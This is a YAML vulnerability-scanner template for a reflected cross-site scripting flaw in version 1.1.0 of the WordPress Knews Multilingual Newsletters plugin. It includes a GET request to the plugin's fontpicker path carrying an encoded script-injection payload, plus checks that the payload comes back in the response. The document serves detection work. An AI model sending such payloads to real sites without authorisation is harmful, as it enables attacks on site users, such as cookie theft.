product: WordPress
vName: WordPress Knews Multilingual Newsletters - Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 3
vDesc: WordPress Knews Multilingual Newsletters 1.1.0 plugin contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
version: 1.1.0
note: ''
search: { }
protocol: http
link: http://web.archive.org/web/20210213220043/https://www.securityfocus.com/bid/54330/info
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
    verify:
      logic: and
      check:
        - body:
            value:
              - </script><script>alert(document.domain)</script>
            logic: and
        - header:
            value:
              - text/html
            logic: and
        - status: 200
